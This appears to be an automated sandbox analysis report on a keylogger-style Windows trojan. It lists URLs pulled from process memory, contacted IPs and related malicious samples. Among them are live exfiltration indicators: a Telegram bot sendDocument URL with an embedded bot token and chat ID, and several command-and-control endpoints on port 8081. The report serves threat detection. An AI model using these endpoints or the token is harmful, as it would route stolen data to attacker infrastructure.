https://duckduckgo.com/ac/?q=	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2915272738.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.2918802703.0000000023A75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C19000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023D1C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039	msiexec.exe, 00000006.00000002.2915272738.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.ndovumotor.com	msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B1E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2325213395.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000006.00000002.2902791239.0000000006F6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.2918802703.0000000023AC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C1F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2325213395.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2915272738.00000000229EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0-	msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2396192756.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.2918802703.0000000023A75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C19000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023D1C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	000027_A-000032.exe, 000027_A-000032.exe.1.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	000027_A-000032.exe, 000027_A-000032.exe.1.dr	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.2915272738.0000000022B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000001.00000002.2324205397.0000000000404000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000006.00000002.2915272738.0000000022A16000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2915272738.00000000229EB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.2918802703.0000000023AC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C1F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A50000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microv	powershell.exe, 00000001.00000002.2329786451.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/6	msiexec.exe, 00000006.00000003.2396192756.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
199.188.200.194	mail.ndovumotor.com	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1618976
Start date and time:	2025-02-19 11:41:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	000027_A-000032.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/26@6/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 132 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 6404 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6384 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:42:08	API Interceptor	39x Sleep call for process: powershell.exe modified
05:43:23	API Interceptor	458x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse
	Proforma_Invoice.pdf.exe	Get hash	malicious	Remcos, AgentTesla	Browse
	SecuriteInfo.com.MSIL.Kryptik.AIWZ.tr.17983.2263.exe	Get hash	malicious	MassLogger RAT	Browse
	rRFQ009742567.scr.exe	Get hash	malicious	VIP Keylogger	Browse
	VSVy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Swift Copy_18.02.2025.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
104.21.16.1	Bank Transfer Accounting Copy.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.fz977.xyz/48bq/
	PO from tpc Type 34.1 34,2 35 Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	PO from tpc Type 34.1 34,2 35 Spec 1.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	ebu.ps1	Get hash	malicious	FormBook	Browse	www.fz977.xyz/48bq/
	BIS_MT103 101T000000121121.exe	Get hash	malicious	FormBook	Browse	www.cheapwil.shop/ekxu/
	crypt.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/0izs/
	ReODK2A5DB.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/
	xBA5hw2TjG.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/406r/
	jKR1K8ayHT.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/do5s/
	greatnamechangedwithgoodnews.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	www.shlomi.app/r0jq/
193.122.130.0	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rRFQ009742567.scr.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	rPO2400525.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Purchase Order 77809 for acknowledgment.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Quote_items1&2.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	AWB_5771388044 Versanddokumente.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Swift Mesaji(1).pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Purchase Order_2025.GZ	Get hash	malicious	DBatLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.ndovumotor.com	HSBC SLIP.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	199.188.200.194
mail.ndovumotor.com	e-dekont.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	199.188.200.194
checkip.dyndns.com	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HUD03ES34ED2025.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	#U94f6#U884c#U8f6c#U8d26#U51ed#U8bc1.vbs	Get hash	malicious	Unknown	Browse	193.122.6.168
reallyfreegeoip.org	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	HUD03ES34ED2025.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	#U94f6#U884c#U8f6c#U8d26#U51ed#U8bc1.vbs	Get hash	malicious	Unknown	Browse	104.21.96.1
api.telegram.org	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Proforma_Invoice.pdf.exe	Get hash	malicious	Remcos, AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.AIWZ.tr.17983.2263.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	rRFQ009742567.scr.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	VSVy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Swift Copy_18.02.2025.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	WyPb2uVZ1P.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Proforma_Invoice.pdf.exe	Get hash	malicious	Remcos, AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.AIWZ.tr.17983.2263.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	rRFQ009742567.scr.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	VSVy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Cpssph Pending Docu Review Complete via-Sign Tuesday February 2025.msg	Get hash	malicious	Unknown	Browse	104.18.69.40
	raro	Get hash	malicious	Unknown	Browse	104.18.86.42
	boQmUWZqnW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.131.87
	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	https://deepseekcaptcha.top/verif.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	https://deepseekcaptcha.top/verif.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	DUE INVOICES #97643592.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.40.68
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	https://microsoftsmailfXHvPDaOlj.iparyamp.ru/EPPc9bab/#aW5mb0BjaXR5ZGV2LmJydXNzZWxz	Get hash	malicious	Unknown	Browse	104.16.2.189
ORACLE-BMC-31898US	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	#U94f6#U884c#U8f6c#U8d26#U51ed#U8bc1.vbs	Get hash	malicious	Unknown	Browse	158.101.44.242
	KAI RUI--Particulars.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	rRFQ009742567.scr.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	Request For Quotation.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
NAMECHEAP-NETUS	iApHTv05Ncbn2Rt.exe	Get hash	malicious	FormBook	Browse	162.213.251.166
	HTD2313_JC-19.02.25.Vbs.vbs	Get hash	malicious	FormBook	Browse	162.213.251.166
	#U94f6#U884c#U8f6c#U8d26#U51ed#U8bc1.vbs	Get hash	malicious	Unknown	Browse	198.54.122.135
	http://grybersker-1024f8a.ingress-erytho.ewp.live/wp-content/plugins/Office/opw/	Get hash	malicious	Unknown	Browse	63.250.43.133
	laser (2).ps1	Get hash	malicious	FormBook	Browse	162.0.231.203
	https://us.content.exclaimer.net/?url=https%3A%2F%2Fmc6gzuhbb.cc.rs6.net%2Ftn.jsp%3Ff%3D001nUW8gKRp2TTUkqvduuVvMwLcZiWFr17IOLWsghQ8WoO1Wd6wh3z0vEJLw8JOm9xAg9_zls5edNvwMnPZ_dP7ohJ4lpzmoYMdHlCZhafLr1F_oDtAiHorZGIzVzIpG3RzGQhnq5EOoDNmKTofcWlyaw4FvdaZ1f6b7lCRma1Q7ZUSNermq0AYSpZroBCwR61iFfnaLiZApFTgt9xbzO_nN8oASrnyD36RNm2XJFh6vK9W9N85IRUYHNSi3LPSZelkhxQ7eTR58yQ%3D%26c%3D%26ch%3D&tenantid=VZNe8uzOEe-QywAiSCk5gQ&templateid=cbf3da90cfecef1190cb002248293981&excomponenttype=SocialMediaIcon&signature=CdvrDnuCsb5dstNKflN6p2b6CcqnSow6lWkKqUagvyt5nbsaPGCnpeMCZcWU0sf6QHjpNCxghX6GsOFOKEf3q6VKVybFMoKUTYrj3PiI8WE05sK8kALb958P8hUEJYb39qTMOSMvAvoC-88a_d5seVXwxUyKklRGitKp02ahi1lZxRB0t3-XIaXp-hlj35ECMBVMSJTg2HoG9qcKMRJ8wOPUPnNR4oOSm9Y9f7kpbuDYDKgArqpM1pGyeDqC8RwrHQ93GsYnukg52j2n3g1Y_qKMx_kV1uZvp1bkfcuJ4qS1TcjUn69MFAQiFzAdHcnwWlN29N0KRylEm6okK7Zn_A&v=1&imprintMessageId=ba1d5a18-a528-45ba-a0b5-1c25108bbf0d	Get hash	malicious	Unknown	Browse	199.188.200.11
	TDeWSCLiZL1MBqR.exe	Get hash	malicious	FormBook	Browse	162.213.251.166
	payment1.js	Get hash	malicious	FormBook	Browse	162.0.231.203
	PO.exe	Get hash	malicious	FormBook	Browse	198.187.31.216
	ORD_VIO-002-2025e-O001.exe	Get hash	malicious	FormBook	Browse	63.250.38.223

JA3 Fingerprints

